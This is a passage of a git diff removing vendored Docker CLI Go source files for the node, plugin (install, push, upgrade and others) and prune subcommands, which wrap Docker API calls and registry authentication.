Reference(ctx, client, nodeID) - if err != nil { - errs = append(errs, err.Error()) - continue - } - - node, _, err := client.NodeInspectWithRaw(ctx, nodeRef) - if err != nil { - errs = append(errs, err.Error()) - continue - } - - filter := opts.filter.Value() - filter.Add("node", node.ID) - - nodeTasks, err := client.TaskList(ctx, types.TaskListOptions{Filters: filter}) - if err != nil { - errs = append(errs, err.Error()) - continue - } - - tasks = append(tasks, nodeTasks...) - } - - if err := task.Print(dockerCli, ctx, tasks, idresolver.New(client, opts.noResolve), opts.noTrunc); err != nil { - errs = append(errs, err.Error()) - } - - if len(errs) > 0 { - return fmt.Errorf("%s", strings.Join(errs, "\n")) - } - - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/node/remove.go b/vendor/github.com/docker/docker/cli/command/node/remove.go deleted file mode 100644 index 19b4a96631..0000000000 --- a/vendor/github.com/docker/docker/cli/command/node/remove.go +++ /dev/null @@ -1,56 +0,0 @@ -package node - -import ( - "fmt" - "strings" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type removeOptions struct { - force bool -} - -func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := removeOptions{} - - cmd := &cobra.Command{ - Use: "rm [OPTIONS] NODE [NODE...]", - Aliases: []string{"remove"}, - Short: "Remove one or more nodes from the swarm", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - return runRemove(dockerCli, args, opts) - }, - } - flags := cmd.Flags() - flags.BoolVarP(&opts.force, "force", "f", false, "Force remove a node from the swarm") - return cmd -} - -func runRemove(dockerCli *command.DockerCli, args []string, opts removeOptions) error { - client := dockerCli.Client() - ctx := context.Background() - - var errs []string - - for _, nodeID := range args { - err := client.NodeRemove(ctx, nodeID, types.NodeRemoveOptions{Force: opts.force}) - if err != nil { - errs = append(errs, err.Error()) - continue - } - fmt.Fprintf(dockerCli.Out(), "%s\n", nodeID) - } - - if len(errs) > 0 { - return fmt.Errorf("%s", strings.Join(errs, "\n")) - } - - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/node/update.go b/vendor/github.com/docker/docker/cli/command/node/update.go deleted file mode 100644 index 65339e138b..0000000000 --- a/vendor/github.com/docker/docker/cli/command/node/update.go +++ /dev/null @@ -1,121 +0,0 @@ -package node - -import ( - "errors" - "fmt" - - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/opts" - runconfigopts "github.com/docker/docker/runconfig/opts" - "github.com/spf13/cobra" - "github.com/spf13/pflag" - "golang.org/x/net/context" -) - -var ( - errNoRoleChange = errors.New("role was already set to the requested value") -) - -func newUpdateCommand(dockerCli *command.DockerCli) *cobra.Command { - nodeOpts := newNodeOptions() - - cmd := &cobra.Command{ - Use: "update [OPTIONS] NODE", - Short: "Update a node", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - return runUpdate(dockerCli, cmd.Flags(), args[0]) - }, - } - - flags := cmd.Flags() - flags.StringVar(&nodeOpts.role, flagRole, "", "Role of the node (worker/manager)") - flags.StringVar(&nodeOpts.availability, flagAvailability, "", "Availability of the node (active/pause/drain)") - flags.Var(&nodeOpts.annotations.labels, flagLabelAdd, "Add or update a node label (key=value)") - labelKeys := opts.NewListOpts(nil) - flags.Var(&labelKeys, flagLabelRemove, "Remove a node label if exists") - return cmd -} - -func runUpdate(dockerCli *command.DockerCli, flags *pflag.FlagSet, nodeID string) error { - success := func(_ string) { - fmt.Fprintln(dockerCli.Out(), nodeID) - } - return updateNodes(dockerCli, []string{nodeID}, mergeNodeUpdate(flags), success) -} - -func updateNodes(dockerCli *command.DockerCli, nodes []string, mergeNode func(node *swarm.Node) error, success func(nodeID string)) error { - client := dockerCli.Client() - ctx := context.Background() - - for _, nodeID := range nodes { - node, _, err := client.NodeInspectWithRaw(ctx, nodeID) - if err != nil { - return err - } - - err = mergeNode(&node) - if err != nil { - if err == errNoRoleChange { - continue - } - return err - } - err = client.NodeUpdate(ctx, node.ID, node.Version, node.Spec) - if err != nil { - return err - } - success(nodeID) - } - return nil -} - -func mergeNodeUpdate(flags *pflag.FlagSet) func(*swarm.Node) error { - return func(node *swarm.Node) error { - spec := &node.Spec - - if flags.Changed(flagRole) { - str, err := flags.GetString(flagRole) - if err != nil { - return err - } - spec.Role = swarm.NodeRole(str) - } - if flags.Changed(flagAvailability) { - str, err := flags.GetString(flagAvailability) - if err != nil { - return err - } - spec.Availability = swarm.NodeAvailability(str) - } - if spec.Annotations.Labels == nil { - spec.Annotations.Labels = make(map[string]string) - } - if flags.Changed(flagLabelAdd) { - labels := flags.Lookup(flagLabelAdd).Value.(*opts.ListOpts).GetAll() - for k, v := range runconfigopts.ConvertKVStringsToMap(labels) { - spec.Annotations.Labels[k] = v - } - } - if flags.Changed(flagLabelRemove) { - keys := flags.Lookup(flagLabelRemove).Value.(*opts.ListOpts).GetAll() - for _, k := range keys { - // if a key doesn't exist, fail the command explicitly - if _, exists := spec.Annotations.Labels[k]; !exists { - return fmt.Errorf("key %s doesn't exist in node's labels", k) - } - delete(spec.Annotations.Labels, k) - } - } - return nil - } -} - -const ( - flagRole = "role" - flagAvailability = "availability" - flagLabelAdd = "label-add" - flagLabelRemove = "label-rm" -) diff --git a/vendor/github.com/docker/docker/cli/command/out.go b/vendor/github.com/docker/docker/cli/command/out.go deleted file mode 100644 index 85718d7acd..0000000000 --- a/vendor/github.com/docker/docker/cli/command/out.go +++ /dev/null @@ -1,69 +0,0 @@ -package command - -import ( - "io" - "os" - - "github.com/Sirupsen/logrus" - "github.com/docker/docker/pkg/term" -) - -// OutStream is an output stream used by the DockerCli to write normal program -// output. -type OutStream struct { - out io.Writer - fd uintptr - isTerminal bool - state *term.State -} - -func (o *OutStream) Write(p []byte) (int, error) { - return o.out.Write(p) -} - -// FD returns the file descriptor number for this stream -func (o *OutStream) FD() uintptr { - return o.fd -} - -// IsTerminal returns true if this stream is connected to a terminal -func (o *OutStream) IsTerminal() bool { - return o.isTerminal -} - -// SetRawTerminal sets raw mode on the output terminal -func (o *OutStream) SetRawTerminal() (err error) { - if os.Getenv("NORAW") != "" || !o.isTerminal { - return nil - } - o.state, err = term.SetRawTerminalOutput(o.fd) - return err -} - -// RestoreTerminal restores normal mode to the terminal -func (o *OutStream) RestoreTerminal() { - if o.state != nil { - term.RestoreTerminal(o.fd, o.state) - } -} - -// GetTtySize returns the height and width in characters of the tty -func (o *OutStream) GetTtySize() (uint, uint) { - if !o.isTerminal { - return 0, 0 - } - ws, err := term.GetWinsize(o.fd) - if err != nil { - logrus.Debugf("Error getting size: %s", err) - if ws == nil { - return 0, 0 - } - } - return uint(ws.Height), uint(ws.Width) -} - -// NewOutStream returns a new OutStream object from a Writer -func NewOutStream(out io.Writer) *OutStream { - fd, isTerminal := term.GetFdInfo(out) - return &OutStream{out: out, fd: fd, isTerminal: isTerminal} -} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/cmd.go b/vendor/github.com/docker/docker/cli/command/plugin/cmd.go deleted file mode 100644 index 92c990a975..0000000000 --- a/vendor/github.com/docker/docker/cli/command/plugin/cmd.go +++ /dev/null @@ -1,31 +0,0 @@ -package plugin - -import ( - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -// NewPluginCommand returns a cobra command for `plugin` subcommands -func NewPluginCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := &cobra.Command{ - Use: "plugin", - Short: "Manage plugins", - Args: cli.NoArgs, - RunE: dockerCli.ShowHelp, - } - - cmd.AddCommand( - newDisableCommand(dockerCli), - newEnableCommand(dockerCli), - newInspectCommand(dockerCli), - newInstallCommand(dockerCli), - newListCommand(dockerCli), - newRemoveCommand(dockerCli), - newSetCommand(dockerCli), - newPushCommand(dockerCli), - newCreateCommand(dockerCli), - newUpgradeCommand(dockerCli), - ) - return cmd -} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/create.go b/vendor/github.com/docker/docker/cli/command/plugin/create.go deleted file mode 100644 index 2aab1e9e4a..0000000000 --- a/vendor/github.com/docker/docker/cli/command/plugin/create.go +++ /dev/null @@ -1,125 +0,0 @@ -package plugin - -import ( - "encoding/json" - "fmt" - "io" - "os" - "path/filepath" - - "github.com/Sirupsen/logrus" - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/pkg/archive" - "github.com/docker/docker/reference" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -// validateTag checks if the given repoName can be resolved. -func validateTag(rawRepo string) error { - _, err := reference.ParseNamed(rawRepo) - - return err -} - -// validateConfig ensures that a valid config.json is available in the given path -func validateConfig(path string) error { - dt, err := os.Open(filepath.Join(path, "config.json")) - if err != nil { - return err - } - - m := types.PluginConfig{} - err = json.NewDecoder(dt).Decode(&m) - dt.Close() - - return err -} - -// validateContextDir validates the given dir and returns abs path on success. -func validateContextDir(contextDir string) (string, error) { - absContextDir, err := filepath.Abs(contextDir) - - stat, err := os.Lstat(absContextDir) - if err != nil { - return "", err - } - - if !stat.IsDir() { - return "", fmt.Errorf("context must be a directory") - } - - return absContextDir, nil -} - -type pluginCreateOptions struct { - repoName string - context string - compress bool -} - -func newCreateCommand(dockerCli *command.DockerCli) *cobra.Command { - options := pluginCreateOptions{} - - cmd := &cobra.Command{ - Use: "create [OPTIONS] PLUGIN PLUGIN-DATA-DIR", - Short: "Create a plugin from a rootfs and configuration. Plugin data directory must contain config.json and rootfs directory.", - Args: cli.RequiresMinArgs(2), - RunE: func(cmd *cobra.Command, args []string) error { - options.repoName = args[0] - options.context = args[1] - return runCreate(dockerCli, options) - }, - } - - flags := cmd.Flags() - - flags.BoolVar(&options.compress, "compress", false, "Compress the context using gzip") - - return cmd -} - -func runCreate(dockerCli *command.DockerCli, options pluginCreateOptions) error { - var ( - createCtx io.ReadCloser - err error - ) - - if err := validateTag(options.repoName); err != nil { - return err - } - - absContextDir, err := validateContextDir(options.context) - if err != nil { - return err - } - - if err := validateConfig(options.context); err != nil { - return err - } - - compression := archive.Uncompressed - if options.compress { - logrus.Debugf("compression enabled") - compression = archive.Gzip - } - - createCtx, err = archive.TarWithOptions(absContextDir, &archive.TarOptions{ - Compression: compression, - }) - - if err != nil { - return err - } - - ctx := context.Background() - - createOptions := types.PluginCreateOptions{RepoName: options.repoName} - if err = dockerCli.Client().PluginCreate(ctx, createCtx, createOptions); err != nil { - return err - } - fmt.Fprintln(dockerCli.Out(), options.repoName) - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/disable.go b/vendor/github.com/docker/docker/cli/command/plugin/disable.go deleted file mode 100644 index 07b0ec2288..0000000000 --- a/vendor/github.com/docker/docker/cli/command/plugin/disable.go +++ /dev/null @@ -1,36 +0,0 @@ -package plugin - -import ( - "fmt" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -func newDisableCommand(dockerCli *command.DockerCli) *cobra.Command { - var force bool - - cmd := &cobra.Command{ - Use: "disable [OPTIONS] PLUGIN", - Short: "Disable a plugin", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - return runDisable(dockerCli, args[0], force) - }, - } - - flags := cmd.Flags() - flags.BoolVarP(&force, "force", "f", false, "Force the disable of an active plugin") - return cmd -} - -func runDisable(dockerCli *command.DockerCli, name string, force bool) error { - if err := dockerCli.Client().PluginDisable(context.Background(), name, types.PluginDisableOptions{Force: force}); err != nil { - return err - } - fmt.Fprintln(dockerCli.Out(), name) - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/enable.go b/vendor/github.com/docker/docker/cli/command/plugin/enable.go deleted file mode 100644 index 77762f4024..0000000000 --- a/vendor/github.com/docker/docker/cli/command/plugin/enable.go +++ /dev/null @@ -1,47 +0,0 @@ -package plugin - -import ( - "fmt" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -type enableOpts struct { - timeout int - name string -} - -func newEnableCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts enableOpts - - cmd := &cobra.Command{ - Use: "enable [OPTIONS] PLUGIN", - Short: "Enable a plugin", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.name = args[0] - return runEnable(dockerCli, &opts) - }, - } - - flags := cmd.Flags() - flags.IntVar(&opts.timeout, "timeout", 0, "HTTP client timeout (in seconds)") - return cmd -} - -func runEnable(dockerCli *command.DockerCli, opts *enableOpts) error { - name := opts.name - if opts.timeout < 0 { - return fmt.Errorf("negative timeout %d is invalid", opts.timeout) - } - - if err := dockerCli.Client().PluginEnable(context.Background(), name, types.PluginEnableOptions{Timeout: opts.timeout}); err != nil { - return err - } - fmt.Fprintln(dockerCli.Out(), name) - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/inspect.go b/vendor/github.com/docker/docker/cli/command/plugin/inspect.go deleted file mode 100644 index c2c7a0d6bc..0000000000 --- a/vendor/github.com/docker/docker/cli/command/plugin/inspect.go +++ /dev/null @@ -1,42 +0,0 @@ -package plugin - -import ( - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/inspect" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -type inspectOptions struct { - pluginNames []string - format string -} - -func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts inspectOptions - - cmd := &cobra.Command{ - Use: "inspect [OPTIONS] PLUGIN [PLUGIN...]", - Short: "Display detailed information on one or more plugins", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.pluginNames = args - return runInspect(dockerCli, opts) - }, - } - - flags := cmd.Flags() - flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") - return cmd -} - -func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error { - client := dockerCli.Client() - ctx := context.Background() - getRef := func(ref string) (interface{}, []byte, error) { - return client.PluginInspectWithRaw(ctx, ref) - } - - return inspect.Inspect(dockerCli.Out(), opts.pluginNames, opts.format, getRef) -} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/install.go b/vendor/github.com/docker/docker/cli/command/plugin/install.go deleted file mode 100644 index 2c3170c54a..0000000000 --- a/vendor/github.com/docker/docker/cli/command/plugin/install.go +++ /dev/null @@ -1,208 +0,0 @@ -package plugin - -import ( - "bufio" - "errors" - "fmt" - "strings" - - distreference "github.com/docker/distribution/reference" - "github.com/docker/docker/api/types" - registrytypes "github.com/docker/docker/api/types/registry" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/image" - "github.com/docker/docker/pkg/jsonmessage" - "github.com/docker/docker/reference" - "github.com/docker/docker/registry" - "github.com/spf13/cobra" - "github.com/spf13/pflag" - "golang.org/x/net/context" -) - -type pluginOptions struct { - remote string - localName string - grantPerms bool - disable bool - args []string - skipRemoteCheck bool -} - -func loadPullFlags(opts *pluginOptions, flags *pflag.FlagSet) { - flags.BoolVar(&opts.grantPerms, "grant-all-permissions", false, "Grant all permissions necessary to run the plugin") - command.AddTrustedFlags(flags, true) -} - -func newInstallCommand(dockerCli *command.DockerCli) *cobra.Command { - var options pluginOptions - cmd := &cobra.Command{ - Use: "install [OPTIONS] PLUGIN [KEY=VALUE...]", - Short: "Install a plugin", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - options.remote = args[0] - if len(args) > 1 { - options.args = args[1:] - } - return runInstall(dockerCli, options) - }, - } - - flags := cmd.Flags() - loadPullFlags(&options, flags) - flags.BoolVar(&options.disable, "disable", false, "Do not enable the plugin on install") - flags.StringVar(&options.localName, "alias", "", "Local name for plugin") - return cmd -} - -func getRepoIndexFromUnnormalizedRef(ref distreference.Named) (*registrytypes.IndexInfo, error) { - named, err := reference.ParseNamed(ref.Name()) - if err != nil { - return nil, err - } - - repoInfo, err := registry.ParseRepositoryInfo(named) - if err != nil { - return nil, err - } - - return repoInfo.Index, nil -} - -type pluginRegistryService struct { - registry.Service -} - -func (s pluginRegistryService) ResolveRepository(name reference.Named) (repoInfo *registry.RepositoryInfo, err error) { - repoInfo, err = s.Service.ResolveRepository(name) - if repoInfo != nil { - repoInfo.Class = "plugin" - } - return -} - -func newRegistryService() registry.Service { - return pluginRegistryService{ - Service: registry.NewService(registry.ServiceOptions{V2Only: true}), - } -} - -func buildPullConfig(ctx context.Context, dockerCli *command.DockerCli, opts pluginOptions, cmdName string) (types.PluginInstallOptions, error) { - // Parse name using distribution reference package to support name - // containing both tag and digest. Names with both tag and digest - // will be treated by the daemon as a pull by digest with - // an alias for the tag (if no alias is provided). - ref, err := distreference.ParseNamed(opts.remote) - if err != nil { - return types.PluginInstallOptions{}, err - } - - index, err := getRepoIndexFromUnnormalizedRef(ref) - if err != nil { - return types.PluginInstallOptions{}, err - } - - repoInfoIndex, err := getRepoIndexFromUnnormalizedRef(ref) - if err != nil { - return types.PluginInstallOptions{}, err - } - remote := ref.String() - - _, isCanonical := ref.(distreference.Canonical) - if command.IsTrusted() && !isCanonical { - var nt reference.NamedTagged - named, err := reference.ParseNamed(ref.Name()) - if err != nil { - return types.PluginInstallOptions{}, err - } - if tagged, ok := ref.(distreference.Tagged); ok { - nt, err = reference.WithTag(named, tagged.Tag()) - if err != nil { - return types.PluginInstallOptions{}, err - } - } else { - named = reference.WithDefaultTag(named) - nt = named.(reference.NamedTagged) - } - - ctx := context.Background() - trusted, err := image.TrustedReference(ctx, dockerCli, nt, newRegistryService()) - if err != nil { - return types.PluginInstallOptions{}, err - } - remote = trusted.String() - } - - authConfig := command.ResolveAuthConfig(ctx, dockerCli, index) - - encodedAuth, err := command.EncodeAuthToBase64(authConfig) - if err != nil { - return types.PluginInstallOptions{}, err - } - - registryAuthFunc := command.RegistryAuthenticationPrivilegedFunc(dockerCli, repoInfoIndex, cmdName) - - options := types.PluginInstallOptions{ - RegistryAuth: encodedAuth, - RemoteRef: remote, - Disabled: opts.disable, - AcceptAllPermissions: opts.grantPerms, - AcceptPermissionsFunc: acceptPrivileges(dockerCli, opts.remote), - // TODO: Rename PrivilegeFunc, it has nothing to do with privileges - PrivilegeFunc: registryAuthFunc, - Args: opts.args, - } - return options, nil -} - -func runInstall(dockerCli *command.DockerCli, opts pluginOptions) error { - var localName string - if opts.localName != "" { - aref, err := reference.ParseNamed(opts.localName) - if err != nil { - return err - } - aref = reference.WithDefaultTag(aref) - if _, ok := aref.(reference.NamedTagged); !ok { - return fmt.Errorf("invalid name: %s", opts.localName) - } - localName = aref.String() - } - - ctx := context.Background() - options, err := buildPullConfig(ctx, dockerCli, opts, "plugin install") - if err != nil { - return err - } - responseBody, err := dockerCli.Client().PluginInstall(ctx, localName, options) - if err != nil { - if strings.Contains(err.Error(), "target is image") { - return errors.New(err.Error() + " - Use `docker image pull`") - } - return err - } - defer responseBody.Close() - if err := jsonmessage.DisplayJSONMessagesToStream(responseBody, dockerCli.Out(), nil); err != nil { - return err - } - fmt.Fprintf(dockerCli.Out(), "Installed plugin %s\n", opts.remote) // todo: return proper values from the API for this result - return nil -} - -func acceptPrivileges(dockerCli *command.DockerCli, name string) func(privileges types.PluginPrivileges) (bool, error) { - return func(privileges types.PluginPrivileges) (bool, error) { - fmt.Fprintf(dockerCli.Out(), "Plugin %q is requesting the following privileges:\n", name) - for _, privilege := range privileges { - fmt.Fprintf(dockerCli.Out(), " - %s: %v\n", privilege.Name, privilege.Value) - } - - fmt.Fprint(dockerCli.Out(), "Do you grant the above permissions? [y/N] ") - reader := bufio.NewReader(dockerCli.In()) - line, _, err := reader.ReadLine() - if err != nil { - return false, err - } - return strings.ToLower(string(line)) == "y", nil - } -} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/list.go b/vendor/github.com/docker/docker/cli/command/plugin/list.go deleted file mode 100644 index 8fd16dae3f..0000000000 --- a/vendor/github.com/docker/docker/cli/command/plugin/list.go +++ /dev/null @@ -1,63 +0,0 @@ -package plugin - -import ( - "fmt" - "strings" - "text/tabwriter" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/pkg/stringid" - "github.com/docker/docker/pkg/stringutils" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -type listOptions struct { - noTrunc bool -} - -func newListCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts listOptions - - cmd := &cobra.Command{ - Use: "ls [OPTIONS]", - Short: "List plugins", - Aliases: []string{"list"}, - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - return runList(dockerCli, opts) - }, - } - - flags := cmd.Flags() - - flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Don't truncate output") - - return cmd -} - -func runList(dockerCli *command.DockerCli, opts listOptions) error { - plugins, err := dockerCli.Client().PluginList(context.Background()) - if err != nil { - return err - } - - w := tabwriter.NewWriter(dockerCli.Out(), 20, 1, 3, ' ', 0) - fmt.Fprintf(w, "ID \tNAME \tDESCRIPTION\tENABLED") - fmt.Fprintf(w, "\n") - - for _, p := range plugins { - id := p.ID - desc := strings.Replace(p.Config.Description, "\n", " ", -1) - desc = strings.Replace(desc, "\r", " ", -1) - if !opts.noTrunc { - id = stringid.TruncateID(p.ID) - desc = stringutils.Ellipsis(desc, 45) - } - - fmt.Fprintf(w, "%s\t%s\t%s\t%v\n", id, p.Name, desc, p.Enabled) - } - w.Flush() - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/push.go b/vendor/github.com/docker/docker/cli/command/plugin/push.go deleted file mode 100644 index 9abb38ec0b..0000000000 --- a/vendor/github.com/docker/docker/cli/command/plugin/push.go +++ /dev/null @@ -1,71 +0,0 @@ -package plugin - -import ( - "fmt" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/image" - "github.com/docker/docker/pkg/jsonmessage" - "github.com/docker/docker/reference" - "github.com/docker/docker/registry" - "github.com/spf13/cobra" -) - -func newPushCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := &cobra.Command{ - Use: "push [OPTIONS] PLUGIN[:TAG]", - Short: "Push a plugin to a registry", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - return runPush(dockerCli, args[0]) - }, - } - - flags := cmd.Flags() - - command.AddTrustedFlags(flags, true) - - return cmd -} - -func runPush(dockerCli *command.DockerCli, name string) error { - named, err := reference.ParseNamed(name) // FIXME: validate - if err != nil { - return err - } - if reference.IsNameOnly(named) { - named = reference.WithDefaultTag(named) - } - ref, ok := named.(reference.NamedTagged) - if !ok { - return fmt.Errorf("invalid name: %s", named.String()) - } - - ctx := context.Background() - - repoInfo, err := registry.ParseRepositoryInfo(named) - if err != nil { - return err - } - authConfig := command.ResolveAuthConfig(ctx, dockerCli, repoInfo.Index) - - encodedAuth, err := command.EncodeAuthToBase64(authConfig) - if err != nil { - return err - } - responseBody, err := dockerCli.Client().PluginPush(ctx, ref.String(), encodedAuth) - if err != nil { - return err - } - defer responseBody.Close() - - if command.IsTrusted() { - repoInfo.Class = "plugin" - return image.PushTrustedReference(dockerCli, repoInfo, named, authConfig, responseBody) - } - - return jsonmessage.DisplayJSONMessagesToStream(responseBody, dockerCli.Out(), nil) -} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/remove.go b/vendor/github.com/docker/docker/cli/command/plugin/remove.go deleted file mode 100644 index 9f3aba9a01..0000000000 --- a/vendor/github.com/docker/docker/cli/command/plugin/remove.go +++ /dev/null @@ -1,55 +0,0 @@ -package plugin - -import ( - "fmt" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -type rmOptions struct { - force bool - - plugins []string -} - -func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts rmOptions - - cmd := &cobra.Command{ - Use: "rm [OPTIONS] PLUGIN [PLUGIN...]", - Short: "Remove one or more plugins", - Aliases: []string{"remove"}, - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.plugins = args - return runRemove(dockerCli, &opts) - }, - } - - flags := cmd.Flags() - flags.BoolVarP(&opts.force, "force", "f", false, "Force the removal of an active plugin") - return cmd -} - -func runRemove(dockerCli *command.DockerCli, opts *rmOptions) error { - ctx := context.Background() - - var errs cli.Errors - for _, name := range opts.plugins { - // TODO: pass names to api instead of making multiple api calls - if err := dockerCli.Client().PluginRemove(ctx, name, types.PluginRemoveOptions{Force: opts.force}); err != nil { - errs = append(errs, err) - continue - } - fmt.Fprintln(dockerCli.Out(), name) - } - // Do not simplify to `return errs` because even if errs == nil, it is not a nil-error interface value. - if errs != nil { - return errs - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/set.go b/vendor/github.com/docker/docker/cli/command/plugin/set.go deleted file mode 100644 index 52b09fb500..0000000000 --- a/vendor/github.com/docker/docker/cli/command/plugin/set.go +++ /dev/null @@ -1,22 +0,0 @@ -package plugin - -import ( - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -func newSetCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := &cobra.Command{ - Use: "set PLUGIN KEY=VALUE [KEY=VALUE...]", - Short: "Change settings for a plugin", - Args: cli.RequiresMinArgs(2), - RunE: func(cmd *cobra.Command, args []string) error { - return dockerCli.Client().PluginSet(context.Background(), args[0], args[1:]) - }, - } - - return cmd -} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/upgrade.go b/vendor/github.com/docker/docker/cli/command/plugin/upgrade.go deleted file mode 100644 index d212cd7e52..0000000000 --- a/vendor/github.com/docker/docker/cli/command/plugin/upgrade.go +++ /dev/null @@ -1,100 +0,0 @@ -package plugin - -import ( - "bufio" - "context" - "fmt" - "strings" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/pkg/jsonmessage" - "github.com/docker/docker/reference" - "github.com/pkg/errors" - "github.com/spf13/cobra" -) - -func newUpgradeCommand(dockerCli *command.DockerCli) *cobra.Command { - var options pluginOptions - cmd := &cobra.Command{ - Use: "upgrade [OPTIONS] PLUGIN [REMOTE]", - Short: "Upgrade an existing plugin", - Args: cli.RequiresRangeArgs(1, 2), - RunE: func(cmd *cobra.Command, args []string) error { - options.localName = args[0] - if len(args) == 2 { - options.remote = args[1] - } - return runUpgrade(dockerCli, options) - }, - } - - flags := cmd.Flags() - loadPullFlags(&options, flags) - flags.BoolVar(&options.skipRemoteCheck, "skip-remote-check", false, "Do not check if specified remote plugin matches existing plugin image") - return cmd -} - -func runUpgrade(dockerCli *command.DockerCli, opts pluginOptions) error { - ctx := context.Background() - p, _, err := dockerCli.Client().PluginInspectWithRaw(ctx, opts.localName) - if err != nil { - return fmt.Errorf("error reading plugin data: %v", err) - } - - if p.Enabled { - return fmt.Errorf("the plugin must be disabled before upgrading") - } - - opts.localName = p.Name - if opts.remote == "" { - opts.remote = p.PluginReference - } - remote, err := reference.ParseNamed(opts.remote) - if err != nil { - return errors.Wrap(err, "error parsing remote upgrade image reference") - } - remote = reference.WithDefaultTag(remote) - - old, err := reference.ParseNamed(p.PluginReference) - if err != nil { - return errors.Wrap(err, "error parsing current image reference") - } - old = reference.WithDefaultTag(old) - - fmt.Fprintf(dockerCli.Out(), "Upgrading plugin %s from %s to %s\n", p.Name, old, remote) - if !opts.skipRemoteCheck && remote.String() != old.String() { - _, err := fmt.Fprint(dockerCli.Out(), "Plugin images do not match, are you sure? ") - if err != nil { - return errors.Wrap(err, "error writing to stdout") - } - - rdr := bufio.NewReader(dockerCli.In()) - line, _, err := rdr.ReadLine() - if err != nil { - return errors.Wrap(err, "error reading from stdin") - } - if strings.ToLower(string(line)) != "y" { - return errors.New("canceling upgrade request") - } - } - - options, err := buildPullConfig(ctx, dockerCli, opts, "plugin upgrade") - if err != nil { - return err - } - - responseBody, err := dockerCli.Client().PluginUpgrade(ctx, opts.localName, options) - if err != nil { - if strings.Contains(err.Error(), "target is image") { - return errors.New(err.Error() + " - Use `docker image pull`") - } - return err - } - defer responseBody.Close() - if err := jsonmessage.DisplayJSONMessagesToStream(responseBody, dockerCli.Out(), nil); err != nil { - return err - } - fmt.Fprintf(dockerCli.Out(), "Upgraded plugin %s to %s\n", opts.localName, opts.remote) // todo: return proper values from the API for this result - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/prune/prune.go b/vendor/github.com/docker/docker/cli/command/prune/prune.go deleted file mode 100644 index a022487fd6..0000000000 --- a/vendor/github.com/docker/docker/cli/command/prune/prune.go +++ /dev/null @@ -1,50 +0,0 @@ -package prune - -import ( - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/container" - "github.com/docker/docker/cli/command/image" - "github.com/docker/docker/cli/command/network" - "github.com/docker/docker/cli/command/volume" - "github.com/spf13/cobra" -) - -// NewContainerPruneCommand returns a cobra prune command for containers -func NewContainerPruneCommand(dockerCli *command.DockerCli) *cobra.Command { - return container.NewPruneCommand(dockerCli) -} - -// NewVolumePruneCommand returns a cobra prune command for volumes -func NewVolumePruneCommand(dockerCli *command.DockerCli) *cobra.Command { - return volume.NewPruneCommand(dockerCli) -} - -// NewImagePruneCommand returns a cobra prune command for images -func NewImagePruneCommand(dockerCli *command.DockerCli) *cobra.Command { - return image.NewPruneCommand(dockerCli) -} - -// NewNetworkPruneCommand returns a cobra prune command for 